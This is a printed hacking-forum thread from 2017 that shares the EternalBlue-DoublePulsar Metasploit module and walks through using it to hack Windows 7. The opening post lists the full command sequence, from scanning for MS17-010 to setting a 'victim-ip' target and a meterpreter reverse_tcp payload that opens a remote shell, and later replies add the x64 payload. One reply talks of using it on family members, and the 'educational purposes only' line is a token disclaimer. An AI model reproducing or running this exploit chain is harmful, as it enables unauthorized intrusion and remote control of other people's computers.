Sinisterly
Leak Eternalblue-Doublepulsar-Metasploit (NSA tools) - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Hacking Tools (https://sinister.ly/Forum-Hacking-Tools)
+--- Thread: Leak Eternalblue-Doublepulsar-Metasploit (NSA tools) (/Thread-Leak-Eternalblue-Doublepulsar-Metasploit-NSA-tools)



Eternalblue-Doublepulsar-Metasploit (NSA tools) - R3set - 06-09-2017

Evil  Evil Eternalblue-Doublepulsar-Metasploit Evil  Evil
Hack Windows 7
Evil  Evil  Evil  Evil  Evil  Evil  Evil  Evil  Evil  Evil  Evil  Evil  Evil  Evil  Evil
get it here :      https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

How to use it :



Used commands:

apt-get update
apt-get install wine
netdiscover
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
options
set RHOSTS victim-ip
exploit
cd Desktop/
git clone https://github.com/ElevenPaths/Eterna...
cd Eternalblue-Doublepulsar-Metasploit
cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
reload_all
use exploit/windows/smb/eternalblue_doublepulsar
options
set DOUBLEPULSARPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
set ETERNALBLUEPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
options
set PROCESSINJECT explorer.exe
set RHOST victim-ip
set TARGETARCHITECTURE x86
show targets
set target 9
set PAYLOAD windows/meterpreter/reverse_tcp
ifconfig
set LHOST your-ip
exploit
getuid
shell
ipconfig

This Post is for educational purposes only. I am not responsible for any illegal/damage causing behavior.


RE: Eternalblue-Doublepulsar-Metasploit (NSA tools) - zorrophreak - 06-09-2017

Well shit. I know the EternalBlue and DoublePulsar exploits were bad. I didn't know they were that easy to execute though. If I can get this to test successfully, I'm gonna be screwing with my family a lot now.


RE: Eternalblue-Doublepulsar-Metasploit (NSA tools) - R3set - 06-09-2017

its work
tested windows 7 86x and 64x
if your victim laptop is 64x type windows/x64/meterpreter/reverse_tcp


RE: Eternalblue-Doublepulsar-Metasploit (NSA tools) - zorrophreak - 06-09-2017

(06-09-2017, 01:19 PM)R3set Wrote: its work
tested windows 7 86x and 64x
if your victim laptop is 64x type windows/x64/meterpreter/reverse_tcp

Well obviously you would need to swap out. and system architecture would be x86 and x64 not 86x and 64x

Pretty terrifying for windows users. I'll check it out when I get home


RE: Eternalblue-Doublepulsar-Metasploit (NSA tools) - Pikami - 06-09-2017

(06-09-2017, 12:56 PM)zorrophreak Wrote: I didn't know they were that easy to execute though.

Everything is easy when someone writes a POC


RE: Eternalblue-Doublepulsar-Metasploit (NSA tools) - mothered - 06-09-2017

It's a shame the video Is not legible.

Nonetheless, appreciated.